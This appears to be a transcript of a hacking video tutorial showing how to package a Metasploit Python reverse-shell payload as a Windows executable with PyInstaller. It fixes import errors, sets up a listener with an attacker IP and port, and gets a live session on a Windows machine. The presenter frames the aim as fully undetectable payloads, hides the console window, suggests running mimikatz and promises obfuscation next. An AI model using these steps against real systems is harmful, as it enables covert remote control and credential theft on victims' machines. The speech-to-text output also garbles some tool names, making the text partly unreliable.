didn't come here to tell you how this is going to end. I came here to tell you how it's going to begin. I'm going to hang up this phone, and then I'm going to show these people what you don't want them to see. I'm going to show them a world without you. A world without rules and controls, without borders or boundaries. A world where anything is possible.
Hey guys, James here from HACK-ATHON, and welcome back to another episode. And I have been getting a few requests from some of my patrons on my social media channels and the comment sections, where it states that Pyinstaller is not creating the executable, or rather, even if it creates the executable, it's not producing a reverse shell. So what I've done is, like, I've gone ahead and created a very simple reverse shell here. A Python reverse shell, a metapeta reverse shell, reverse TCP. And if I go ahead and do a cat, let's say cat, we see this. So this is basically a base 64 decoded encoded payload. Now let's go ahead and see the conventional method of turning this into an exe. So to do that, what you guys do is wine Pyinstaller. Well, that's wrong. That's absolutely wrong. What you have to do is /root /.wine /drive c /python. I've got two versions here, so I'll do python 27 /script, and any version over python 2.7.3 has got Pyinstaller pre-installed in its script directory. So I'll do a Pyinstaller backf, that's like one file, non-fud.py, and this is like reproducing the error that you guys get, right? Now let me just go ahead and do something. Let me set up metapeta. So I'll do a use exploit multi handler set payload, and I'll set the payload here real fast. Set lhost 192.168.225.195. You can use your ngrok or server IP as well if you want. Set lport equals 4444. Set exit on session false. I'll start the exploit as background job -j, and that'll start the exploit. Let's have a look at Pyinstaller right now. Right, so Pyinstaller has gone ahead and created the file. Let's go ahead and extract the file. I'll just remove this file because this file was an old one where I think I went ahead and removed it. Let me just refresh this. Yeah, it's gone. So this would be in the dist folder under Python. Like if I go to cd dist ls, I'll get nonfud.exe there. So if I copy this and bring it here in JS, this is reproducing the error. Bear that in mind, please. Alright, so we have got this. I have to drop this, and I would go and execute this. And as you can see, it says no module name socket. Right now, why are we getting this? Right, so let's dig deep into that. I'll be talking while I'm coding, so we'll have to pay more attention here. The reason being, first of all, Pyinstaller works in stages. Right, and just in case if there are any submodules within a particular module that are present, then you would be getting this particular error. Because Pyinstaller cannot go ahead and distinguish between, or rather parse the submodules uh, in the main module and load them up on the runtime. That's something that you have to do manually. So having said that, let's go ahead and run this command with a bit of a modification here. --debug equals all --debug equals imports and non-fud.py, and I'll let this complete. So as you can see, it has gone ahead and completed. So I'll just go to this particular folder, remove this baby, and I'll go back to dist, and I'll copy this, and I'll go back to JS, and I'll paste this. So you'll get a lot of things. So as you can see here, it says no module found in case of sockets. Now if you look at the initial error here, perhaps this one, yeah, this one, no module found sockets. Right, so how to fix this? So we know what the point of failure is, and my experience tells me that there are other points of failures as well. So I'll go ahead and show you a way to go and mitigate this. All right, so once again I would be talking while I'm coding, so I'll do a rather, it's already there. Right, so I would go ahead and hyphen hidden was it hidden import or imports? Let me check once. I think it was hidden imports. No, hidden import. It was hidden import. Socket. Let me just go and copy this. Now my experience is that SSL is also required. Base 64 star is also required. I'll put this in quotes. And my experience says that platform is also required, and code is also required, and SHUtil is also required. Let me see what I've missed out. Oh yeah, right. Time is also required. OS is also required. And what else? Struct is also required. Now I'll go ahead and show you guys something that would go ahead and cement this thing. You see, this is like a base 64 encoding, right? Now base 64 encoding, like as you guys know, it's no longer it does not make the FUD or it does not make the payload any less detectable. Like it's the same. So what I've done here is I've gone ahead and copied the entire thing here, like the base 64 payload, and I would be decoding it. So once decoded, that'll go ahead and give me the actual output of the payload here. So I'll just copy this, and I'll come back here, nano non-fud.py, and I'll just go back and I'll delete everything. Right, as you can see, like I'm deleting the payload here until exec, like execute, and I'll hit enter. And you'll have to be very careful about the indentation, because if the indentation breaks, you'll get an indentation error. Alright, so I'll just go and copy this and save this, and that's almost done. And I have staged my command here to go ahead and create the flood that, or rather the payload that would work with all the imports. So let me just go and start the installation process, or rather the construction process here. So it's going ahead and analyzing socket. It has found socket. It would go ahead and base64.star was not found, but if I just put in base64, it would have gone ahead and picked it up. So that's not a big deal. Don't worry about it. I can always go back and do that, but I have taken out base64 from the entire picture, so it would not really matter if base64 was not found. So I have got this session here. So let me do a cd dist, because the payload is in dist, as you can see, non-fud.exe. Let me see if the session is running or not. Yes, I can see that the session is running. And now I will go ahead and port this to my Windows machine. So I'll just delete this, and I'll go back here to the dist folder, and I'll go ahead and copy this here. And as soon as I go ahead and do that, and either double left click or drag and drop that on Windows prompt or command prompt, it would say stay persistent. It will not like error out and go off. Like I'll show you what I'm talking about. You see, it's persistent right now, and as you can see, it's going ahead and sending the sessions, and I've got a session open. So if I do a session right now, I should be getting a MetaPress session, a Python session. So I'll interact with the session -i1, and it has started interaction with the session, and I should be getting, like, let me see what commands I have here. Well, the commands are not that extensive for a Python shell, but then again, like, you get the basic idea of what we are doing here, right? So we have got a shell. We can go ahead and pretty much do everything. Like, we can run mimikatz or any other tool. We can, like, go ahead and load up other modules as well if you want to, but these are the basic ways to go ahead and do this. We can also do another thing, uh, like, as you would see, if I do an ls here, I have this particular file scrippy.py. Well, it was, I wanted to name it script, but there was a typo, so it, and I didn't go ahead and change it. So if I do a nano scrippy.py, you'll see that I've gone ahead and pre-mentioned a few of the pen, or rather the the modules, hidden imports here. So if you go ahead and use this, let's say like this, runtime hook equals py. It'll go ahead and create the FUD, and we should be going ahead and getting the same results as we got previously. But in this particular case, you don't have to go ahead and type in all those hidden imports and stuff like that. You can go ahead and do that from a singular file, and it will load up on one time. So there we go. Let me just go ahead and stop this. You can use a non-console option as well, where the console will not show up. If I go to dist, I'll copy this and I'll come back here to JS real fast, and I'll just make sure that I have exited out of the session, no active sessions. And if I go ahead and do this, let's see what we get. And we get a session as usual. There we go. So these are the ways that you can go ahead and debug your Pyinstaller errors, and get the things up and running as soon as possible. I would be creating another video to obfuscate this particular payload, so stay tuned to my channel and do subscribe to my channel, because I want you to be there on my next exploit, and I want you guys to comment and let me know what you want to see the next time, because you guys are the arc reactor that powers this Iron Man, right? So stay tuned, be happy, and have a good day, evening, or night wherever you are. God bless you now. Take care. Bye bye.